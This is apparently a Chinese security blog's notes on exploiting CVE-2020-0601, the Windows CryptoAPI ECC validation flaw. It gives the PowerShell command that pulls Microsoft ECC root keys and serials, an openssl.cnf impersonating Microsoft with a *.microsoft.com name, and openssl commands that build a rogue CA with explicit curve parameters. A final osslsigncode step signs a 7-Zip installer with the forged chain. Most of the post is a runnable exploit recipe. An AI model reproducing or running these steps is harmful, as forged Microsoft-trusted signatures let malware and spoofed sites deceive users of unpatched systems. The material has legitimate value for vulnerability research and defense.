CVE-2020-0601 伪造签名笔记

  • A+
所属分类:安全博客

安装依赖

1
2
3
4
5
pip3 install fastecdsa
pip3 install PyCryptodome
pip3 install --user gmpy2==2.1.0a2
apt install libmpc-dev
apt install osslsigncode

获取系统ecc加密的证书

1
2
3
4
5
6
7
8
9
dir Cert:LocalMachineroot -Recurse|?{$_.FriendlyName -like "*ECC*"} |%{New-Object -TypeName psobject -Property @{
SerialNumber='0x'+$_.SerialNumber.tolower()
FriendlyName=$_.FriendlyName
publickey=[bitconverter]::tostring($_.publickey.encodedkeyvalue.rawdata).replace('-','').tolower()
publickeylen=[bitconverter]::tostring($_.publickey.encodedkeyvalue.rawdata).replace('-','').length
Subject=$_.Subject

}
} |Format-list
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
SerialNumber : 0x153875e1647ed1b047b4efaf41128245
publickeylen : 194
publickey : 04decdbb7020f12520b494e8d7b43b0f6e87ddabaccf4d402f81336b590918d6870d26239cb48d959d769fa5b90642e6ad36b2c4b3ae7a3c08d5cb9d3a5e45216c0be320f59bc2dd4433e342b9eaf2284292aafe0c07ca8a13993b6200eddaf335
FriendlyName : Microsoft ECC TS Root Certificate Authority 2018
Subject : CN=Microsoft ECC TS Root Certificate Authority 2018, O=Microsoft Corporation, L=Redmond, S=Washington, C
=US

SerialNumber : 0x14982666dc7ccd8f4053677bb999ec85
publickeylen : 194
publickey : 04c711162a761d568ebeb96265d4c3ceb4f0c330ec8f6dd76e39bcc849ababb8e34378d581065defc77d9fced6b39075de0cb090de23bac8d13e67e019a91b86311e5f342dee17fd15fb7e278a32a1eac98fc97e18cb2f3b2c487a7da6f40107ac
FriendlyName : Microsoft ECC Product Root Certificate Authority 2018
Subject : CN=Microsoft ECC Product Root Certificate Authority 2018, O=Microsoft Corporation, L=Redmond, S=Washingt
on, C=US

SerialNumber : 0x38623f7c7714c6aa4424574a882945ae
publickeylen : 194
publickey : 04d4ea1667c2960315edd21086c2c7904d88129154a0426d827d062f2cefd47c47469b16f3a8118a84aa11e11310a39c678bd15cde7a7bd51583ea4224be7b48585a0d9b016b35dff1756ce087c9bf305a9ea3c9c5868130bba3aadd9af1c40840
FriendlyName : Microsoft ECC Development Root Certificate Authority 2018
Subject : CN=Microsoft ECC Development Root Certificate Authority 2018, O=Microsoft Corporation, L=Redmond, S=Wash
ington, C=US

修改: openssl.cnf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[ req ]
prompt = no
distinguished_name = req_distinguished_name
x509_extensions = v3_req
[ req_distinguished_name ]
C = US
ST = Washington
L = Redmond
O = Microsoft Corporation
CN = Microsoft ECC Product Root Certificate Authority 2018
[v3_req]
subjectAltName = @alt_names
[alt_names]
DNS.1 = *.microsoft.com
1
openssl ecparam -name secp384r1 -genkey -noout -out p384-key.pem -param_enc explicit

修改gen-key.py publickey剔除开头的04

1
python3 gen-key.py

填入SerialNumber

1
openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -set_serial 0x14982666dc7ccd8f4053677bb999ec85
1
2
3
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem
openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr
openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf

生成 pkcs12并对文件进行签名

1
2
openssl pkcs12 -export -in client-cert.pem -inkey prime256v1-privkey.pem -certfile ca-rogue.pem -out cert.p12
osslsigncode sign -pkcs12 cert.p12 -n "Signed by wawa" -in 7z1900-x64.exe -out 7z1900-x64_signed.exe

效果

CVE-2020-0601 伪造签名笔记

感谢: zcgonvh & scanf 提供思路

gen-key
CVE-2020-0601

Source:wolvez.club | Author:wolvez

相关推荐: Silver的二进制学习记(1):复习字符串漏洞

Silver的二进制学习记(1):复习字符串漏洞 Last updated:Dec.27, 2015 CST 02:20:23 0x00 复习对象 0x01 成因 0x02 基础复习 函数调用和返回流程 内存管理 0x03 栈粉碎 0x04 代码注入 0x05…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: